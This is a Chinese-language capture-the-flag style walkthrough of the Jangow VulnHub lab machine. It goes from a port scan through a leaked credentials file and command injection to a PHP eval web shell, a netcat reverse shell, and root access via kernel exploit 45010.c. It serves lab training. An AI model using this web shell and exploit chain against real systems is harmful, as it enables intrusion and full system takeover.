https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova
NAT模式
kali:192.168.242.131
靶机:192.168.242.136
上来先信息收集(属于是肌肉记忆了)
nmap扫一波端口,只开放了21和80端口。
dirsearch爆破目录,发现.backup文件。
访问.backup,是个连接数据库的配置文件,直接拿到数据库账号密码(芜湖)。
用这个账号连ftp试试(连上了,但没什么有用的信息)
再回到80端口,点击Buscar
在buscar传参处改为pwd,可以命令执行
利用echo写入一句话木马echo '<?php eval($_POST["cmd"]);?>'>eval.php
ls查看,成功写入
蚁剑连接
写入shell.php反弹nc,这里只能反弹443端口
访问shell.php触发反弹
切换完整的交互式bashpython3 -c import pty;pty.spawn("/bin/bash")
蚁剑打开终端,查看系统信息进行提权,内核版本是ubuntu16.04
searchsploit搜索ubuntu16.04,利用45010.c可提权
把45010.c的代码复制出来,使用蚁剑上传eval.c
gcc编译eva.cggc eval.c -o eval
给编译好的eval执行权限chmod +x eval
执行eval提权,得到root权限
拿flag咯
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 1400.00 | 0 | 2023-07-26 13:01:57 | 平台唯一 500 深度 200 普适 400 可读 200 稀缺 100 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
simon
发表于 2023-8-1
靶场源地址有吗,想下一下其他的靶场
评论列表
加载数据中...